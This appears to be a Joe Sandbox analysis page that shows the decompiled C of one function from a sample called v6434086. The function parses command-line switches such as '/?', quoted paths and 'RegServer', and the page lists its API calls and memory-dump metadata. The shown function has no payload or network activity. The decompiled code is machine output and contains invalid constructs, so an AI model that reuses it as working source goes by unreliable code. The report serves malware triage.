                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                        Function 00BC5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMONCrypto
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00BC5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00BC6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00BC6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0xbc8004; // 0x9f7d84ca
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E00BC597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E00BC44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0xbc9124 = E00BC6285();
									_t75 = 0;
								}
								return E00BC6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E00BC44B9(0, 0x521, 0xbc1140, 0, 0x40, 0);
												_t85 =  *0xbc8588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E00BC667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E00BC667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00BC5C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00BC1680(0xbc8c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E00BC667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E00BC667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0xbc8a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00BC5C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0xbc8b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0xbc8a3a;
																}
																E00BC1680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E00BC658A(_t218, 0x104, 0xbc1140);
																if(E00BC31E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0xbc8a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0xbc8a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0xbc8a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0xbc8a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0xbc8a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0xbc9a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0xbc9a2c =  *0xbc9a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0xbc8d48 =  *0xbc8d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0xbc9a2c =  *0xbc9a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0xbc9a2c =  *0xbc9a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0xbc8d48 =  *0xbc8d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0xbc9a2c =  *0xbc9a2c | 0x00000004;
																										L70:
																										 *0xbc8a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0xbc9a2c = 3;
																	 *0xbc8a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0xbc8a2c != 0 &&  *0xbc8b3e == 0) {
						if(GetModuleFileNameA( *0xbc9a3c, 0xbc8b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E00BC66C8(0xbc8b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}


































































                                                                                                                                                                                                        0x00bc5c9e
                                                                                                                                                                                                        0x00bc5ca9
                                                                                                                                                                                                        0x00bc5cb0
                                                                                                                                                                                                        0x00bc5cb3
                                                                                                                                                                                                        0x00bc5cb6
                                                                                                                                                                                                        0x00bc5cb7
                                                                                                                                                                                                        0x00bc5cb8
                                                                                                                                                                                                        0x00bc5cbd
                                                                                                                                                                                                        0x00bc6204
                                                                                                                                                                                                        0x00bc5ccb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5ccb
                                                                                                                                                                                                        0x00bc5cd3
                                                                                                                                                                                                        0x00bc5cd7
                                                                                                                                                                                                        0x00bc5cf4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5cf4
                                                                                                                                                                                                        0x00bc5cf8
                                                                                                                                                                                                        0x00bc5d00
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d06
                                                                                                                                                                                                        0x00bc5d06
                                                                                                                                                                                                        0x00bc5d0e
                                                                                                                                                                                                        0x00bc5d10
                                                                                                                                                                                                        0x00bc5d12
                                                                                                                                                                                                        0x00bc5d14
                                                                                                                                                                                                        0x00bc5d15
                                                                                                                                                                                                        0x00bc5d17
                                                                                                                                                                                                        0x00bc5d49
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d19
                                                                                                                                                                                                        0x00bc5d19
                                                                                                                                                                                                        0x00bc5d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d3f
                                                                                                                                                                                                        0x00bc5d3f
                                                                                                                                                                                                        0x00bc5d4b
                                                                                                                                                                                                        0x00bc5d4b
                                                                                                                                                                                                        0x00bc5d4f
                                                                                                                                                                                                        0x00bc5d8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d93
                                                                                                                                                                                                        0x00bc5d93
                                                                                                                                                                                                        0x00bc5d9a
                                                                                                                                                                                                        0x00bc5d9d
                                                                                                                                                                                                        0x00bc5d9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d9e
                                                                                                                                                                                                        0x00bc5d51
                                                                                                                                                                                                        0x00bc5d5b
                                                                                                                                                                                                        0x00bc5d72
                                                                                                                                                                                                        0x00bc60fb
                                                                                                                                                                                                        0x00bc60fb
                                                                                                                                                                                                        0x00bc6207
                                                                                                                                                                                                        0x00bc620a
                                                                                                                                                                                                        0x00bc620b
                                                                                                                                                                                                        0x00bc620e
                                                                                                                                                                                                        0x00bc6217
                                                                                                                                                                                                        0x00bc5d78
                                                                                                                                                                                                        0x00bc5d78
                                                                                                                                                                                                        0x00bc5d80
                                                                                                                                                                                                        0x00bc5d83
                                                                                                                                                                                                        0x00bc5d84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d84
                                                                                                                                                                                                        0x00bc5d5d
                                                                                                                                                                                                        0x00bc5d5f
                                                                                                                                                                                                        0x00bc5d62
                                                                                                                                                                                                        0x00bc5d68
                                                                                                                                                                                                        0x00bc5d64
                                                                                                                                                                                                        0x00bc5d64
                                                                                                                                                                                                        0x00bc5d64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d62
                                                                                                                                                                                                        0x00bc5d5b
                                                                                                                                                                                                        0x00bc5d4f
                                                                                                                                                                                                        0x00bc5d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d9f
                                                                                                                                                                                                        0x00bc5d9f
                                                                                                                                                                                                        0x00bc5da5
                                                                                                                                                                                                        0x00bc5dab
                                                                                                                                                                                                        0x00bc5dba
                                                                                                                                                                                                        0x00bc6218
                                                                                                                                                                                                        0x00bc621d
                                                                                                                                                                                                        0x00bc6220
                                                                                                                                                                                                        0x00bc6221
                                                                                                                                                                                                        0x00bc6229
                                                                                                                                                                                                        0x00bc6230
                                                                                                                                                                                                        0x00bc6247
                                                                                                                                                                                                        0x00bc626a
                                                                                                                                                                                                        0x00bc6272
                                                                                                                                                                                                        0x00bc6249
                                                                                                                                                                                                        0x00bc6255
                                                                                                                                                                                                        0x00bc625f
                                                                                                                                                                                                        0x00bc6264
                                                                                                                                                                                                        0x00bc6264
                                                                                                                                                                                                        0x00bc6284
                                                                                                                                                                                                        0x00bc5dc0
                                                                                                                                                                                                        0x00bc5dc0
                                                                                                                                                                                                        0x00bc5dca
                                                                                                                                                                                                        0x00bc5e22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5dcc
                                                                                                                                                                                                        0x00bc5dce
                                                                                                                                                                                                        0x00bc5e24
                                                                                                                                                                                                        0x00bc5e24
                                                                                                                                                                                                        0x00bc5e2c
                                                                                                                                                                                                        0x00bc5e47
                                                                                                                                                                                                        0x00bc5e4a
                                                                                                                                                                                                        0x00bc61d2
                                                                                                                                                                                                        0x00bc61e2
                                                                                                                                                                                                        0x00bc61e7
                                                                                                                                                                                                        0x00bc61ee
                                                                                                                                                                                                        0x00bc61f1
                                                                                                                                                                                                        0x00bc61f1
                                                                                                                                                                                                        0x00bc61f8
                                                                                                                                                                                                        0x00bc61f8
                                                                                                                                                                                                        0x00bc5e50
                                                                                                                                                                                                        0x00bc5e53
                                                                                                                                                                                                        0x00bc6109
                                                                                                                                                                                                        0x00bc611f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6125
                                                                                                                                                                                                        0x00bc6137
                                                                                                                                                                                                        0x00bc613a
                                                                                                                                                                                                        0x00bc613c
                                                                                                                                                                                                        0x00bc613e
                                                                                                                                                                                                        0x00bc613e
                                                                                                                                                                                                        0x00bc6141
                                                                                                                                                                                                        0x00bc6141
                                                                                                                                                                                                        0x00bc6143
                                                                                                                                                                                                        0x00bc6144
                                                                                                                                                                                                        0x00bc614a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6150
                                                                                                                                                                                                        0x00bc6152
                                                                                                                                                                                                        0x00bc615c
                                                                                                                                                                                                        0x00bc6170
                                                                                                                                                                                                        0x00bc6172
                                                                                                                                                                                                        0x00bc617c
                                                                                                                                                                                                        0x00bc6190
                                                                                                                                                                                                        0x00bc6190
                                                                                                                                                                                                        0x00bc6196
                                                                                                                                                                                                        0x00bc61a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc61ab
                                                                                                                                                                                                        0x00bc61b9
                                                                                                                                                                                                        0x00bc61c6
                                                                                                                                                                                                        0x00bc61c6
                                                                                                                                                                                                        0x00bc617e
                                                                                                                                                                                                        0x00bc6180
                                                                                                                                                                                                        0x00bc618a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc618a
                                                                                                                                                                                                        0x00bc615e
                                                                                                                                                                                                        0x00bc6160
                                                                                                                                                                                                        0x00bc616a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc616a
                                                                                                                                                                                                        0x00bc615c
                                                                                                                                                                                                        0x00bc614a
                                                                                                                                                                                                        0x00bc610b
                                                                                                                                                                                                        0x00bc610e
                                                                                                                                                                                                        0x00bc610e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5e59
                                                                                                                                                                                                        0x00bc5e59
                                                                                                                                                                                                        0x00bc5e5c
                                                                                                                                                                                                        0x00bc604f
                                                                                                                                                                                                        0x00bc6056
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc605c
                                                                                                                                                                                                        0x00bc606e
                                                                                                                                                                                                        0x00bc6071
                                                                                                                                                                                                        0x00bc6073
                                                                                                                                                                                                        0x00bc6075
                                                                                                                                                                                                        0x00bc6075
                                                                                                                                                                                                        0x00bc6078
                                                                                                                                                                                                        0x00bc6078
                                                                                                                                                                                                        0x00bc607a
                                                                                                                                                                                                        0x00bc607b
                                                                                                                                                                                                        0x00bc6081
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6087
                                                                                                                                                                                                        0x00bc6087
                                                                                                                                                                                                        0x00bc608d
                                                                                                                                                                                                        0x00bc609c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc60a2
                                                                                                                                                                                                        0x00bc60aa
                                                                                                                                                                                                        0x00bc60b2
                                                                                                                                                                                                        0x00bc60b7
                                                                                                                                                                                                        0x00bc60bd
                                                                                                                                                                                                        0x00bc60bf
                                                                                                                                                                                                        0x00bc60bf
                                                                                                                                                                                                        0x00bc60d6
                                                                                                                                                                                                        0x00bc60e0
                                                                                                                                                                                                        0x00bc60e7
                                                                                                                                                                                                        0x00bc60f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc60f5
                                                                                                                                                                                                        0x00bc609c
                                                                                                                                                                                                        0x00bc6081
                                                                                                                                                                                                        0x00bc5e62
                                                                                                                                                                                                        0x00bc5e62
                                                                                                                                                                                                        0x00bc5e65
                                                                                                                                                                                                        0x00bc5fd3
                                                                                                                                                                                                        0x00bc5fe9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5fef
                                                                                                                                                                                                        0x00bc5fef
                                                                                                                                                                                                        0x00bc5ff7
                                                                                                                                                                                                        0x00bc5ffd
                                                                                                                                                                                                        0x00bc6003
                                                                                                                                                                                                        0x00bc6006
                                                                                                                                                                                                        0x00bc6011
                                                                                                                                                                                                        0x00bc6014
                                                                                                                                                                                                        0x00bc603d
                                                                                                                                                                                                        0x00bc6016
                                                                                                                                                                                                        0x00bc6018
                                                                                                                                                                                                        0x00bc6019
                                                                                                                                                                                                        0x00bc601b
                                                                                                                                                                                                        0x00bc6033
                                                                                                                                                                                                        0x00bc601d
                                                                                                                                                                                                        0x00bc6020
                                                                                                                                                                                                        0x00bc6029
                                                                                                                                                                                                        0x00bc6022
                                                                                                                                                                                                        0x00bc6022
                                                                                                                                                                                                        0x00bc6022
                                                                                                                                                                                                        0x00bc6020
                                                                                                                                                                                                        0x00bc601b
                                                                                                                                                                                                        0x00bc6042
                                                                                                                                                                                                        0x00bc6044
                                                                                                                                                                                                        0x00bc6046
                                                                                                                                                                                                        0x00bc604a
                                                                                                                                                                                                        0x00bc5ff7
                                                                                                                                                                                                        0x00bc5fd5
                                                                                                                                                                                                        0x00bc5fd8
                                                                                                                                                                                                        0x00bc5fd8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5e6b
                                                                                                                                                                                                        0x00bc5e6b
                                                                                                                                                                                                        0x00bc5e6e
                                                                                                                                                                                                        0x00bc5f8b
                                                                                                                                                                                                        0x00bc5f99
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5f9f
                                                                                                                                                                                                        0x00bc5fa7
                                                                                                                                                                                                        0x00bc5faf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5fb1
                                                                                                                                                                                                        0x00bc5fb3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5fb5
                                                                                                                                                                                                        0x00bc5fb7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5fb9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5fb9
                                                                                                                                                                                                        0x00bc5fb7
                                                                                                                                                                                                        0x00bc5fb3
                                                                                                                                                                                                        0x00bc5faf
                                                                                                                                                                                                        0x00bc5f8d
                                                                                                                                                                                                        0x00bc5f8d
                                                                                                                                                                                                        0x00bc5f8d
                                                                                                                                                                                                        0x00bc5f8f
                                                                                                                                                                                                        0x00bc5fc1
                                                                                                                                                                                                        0x00bc5fc1
                                                                                                                                                                                                        0x00bc5fc1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5e74
                                                                                                                                                                                                        0x00bc5e74
                                                                                                                                                                                                        0x00bc5e77
                                                                                                                                                                                                        0x00bc5ea0
                                                                                                                                                                                                        0x00bc5ebd
                                                                                                                                                                                                        0x00bc5f79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5f7f
                                                                                                                                                                                                        0x00bc5ec3
                                                                                                                                                                                                        0x00bc5ec3
                                                                                                                                                                                                        0x00bc5ecc
                                                                                                                                                                                                        0x00bc5ed4
                                                                                                                                                                                                        0x00bc5ed6
                                                                                                                                                                                                        0x00bc5edc
                                                                                                                                                                                                        0x00bc5edf
                                                                                                                                                                                                        0x00bc5eea
                                                                                                                                                                                                        0x00bc5eed
                                                                                                                                                                                                        0x00bc5f3f
                                                                                                                                                                                                        0x00bc5f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5eef
                                                                                                                                                                                                        0x00bc5eef
                                                                                                                                                                                                        0x00bc5ef2
                                                                                                                                                                                                        0x00bc5f34
                                                                                                                                                                                                        0x00bc5ef4
                                                                                                                                                                                                        0x00bc5ef4
                                                                                                                                                                                                        0x00bc5ef7
                                                                                                                                                                                                        0x00bc5f2b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5ef9
                                                                                                                                                                                                        0x00bc5ef9
                                                                                                                                                                                                        0x00bc5efc
                                                                                                                                                                                                        0x00bc5f22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5efe
                                                                                                                                                                                                        0x00bc5eff
                                                                                                                                                                                                        0x00bc5f02
                                                                                                                                                                                                        0x00bc5f16
                                                                                                                                                                                                        0x00bc5f04
                                                                                                                                                                                                        0x00bc5f07
                                                                                                                                                                                                        0x00bc5f0d
                                                                                                                                                                                                        0x00bc5f46
                                                                                                                                                                                                        0x00bc5f46
                                                                                                                                                                                                        0x00bc5f09
                                                                                                                                                                                                        0x00bc5f09
                                                                                                                                                                                                        0x00bc5f09
                                                                                                                                                                                                        0x00bc5f07
                                                                                                                                                                                                        0x00bc5f02
                                                                                                                                                                                                        0x00bc5efc
                                                                                                                                                                                                        0x00bc5ef7
                                                                                                                                                                                                        0x00bc5ef2
                                                                                                                                                                                                        0x00bc5f4c
                                                                                                                                                                                                        0x00bc5f4e
                                                                                                                                                                                                        0x00bc5f50
                                                                                                                                                                                                        0x00bc5f54
                                                                                                                                                                                                        0x00bc5ed4
                                                                                                                                                                                                        0x00bc5ea2
                                                                                                                                                                                                        0x00bc5ea4
                                                                                                                                                                                                        0x00bc5eaf
                                                                                                                                                                                                        0x00bc5eaf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5e79
                                                                                                                                                                                                        0x00bc5e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5e83
                                                                                                                                                                                                        0x00bc5e83
                                                                                                                                                                                                        0x00bc5e83
                                                                                                                                                                                                        0x00bc5e85
                                                                                                                                                                                                        0x00bc5e85
                                                                                                                                                                                                        0x00bc5e8e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5e94
                                                                                                                                                                                                        0x00bc5e8e
                                                                                                                                                                                                        0x00bc5e7d
                                                                                                                                                                                                        0x00bc5e77
                                                                                                                                                                                                        0x00bc5e6e
                                                                                                                                                                                                        0x00bc5e65
                                                                                                                                                                                                        0x00bc5e5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5dd0
                                                                                                                                                                                                        0x00bc5dd0
                                                                                                                                                                                                        0x00bc5dd0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5dd0
                                                                                                                                                                                                        0x00bc5dce
                                                                                                                                                                                                        0x00bc5dca
                                                                                                                                                                                                        0x00bc5dba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d00
                                                                                                                                                                                                        0x00bc5dd9
                                                                                                                                                                                                        0x00bc5e04
                                                                                                                                                                                                        0x00bc61fe
                                                                                                                                                                                                        0x00bc5e0a
                                                                                                                                                                                                        0x00bc5e0c
                                                                                                                                                                                                        0x00bc5e17
                                                                                                                                                                                                        0x00bc5e17
                                                                                                                                                                                                        0x00bc5e04
                                                                                                                                                                                                        0x00bc6200
                                                                                                                                                                                                        0x00bc6200
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00BC5CEE
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00BC8B3E,00000104,00000000,?,?), ref: 00BC5DFC
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00BC5E3E
                                                                                                                                                                                                        • CharUpperA.USER32(-00000052), ref: 00BC5EE1
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00BC5F6F
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00BC5FA7
                                                                                                                                                                                                        • CharUpperA.USER32(-0000004E), ref: 00BC6008
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00BC60AA
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00BC1140,00000000,00000040,00000000), ref: 00BC61F1
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00BC61F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
                                                                                                                                                                                                        • API String ID: 1203814774-25366791
                                                                                                                                                                                                        • Opcode ID: 1daf4c0e7212e6dd285d5a6c32ce93390c9fe848ace84f334960e48f7e7b1f20
                                                                                                                                                                                                        • Instruction ID: 033a691e9771239a5590d2efc0da4d81114e644608bfe698e96b3483d9e719e3
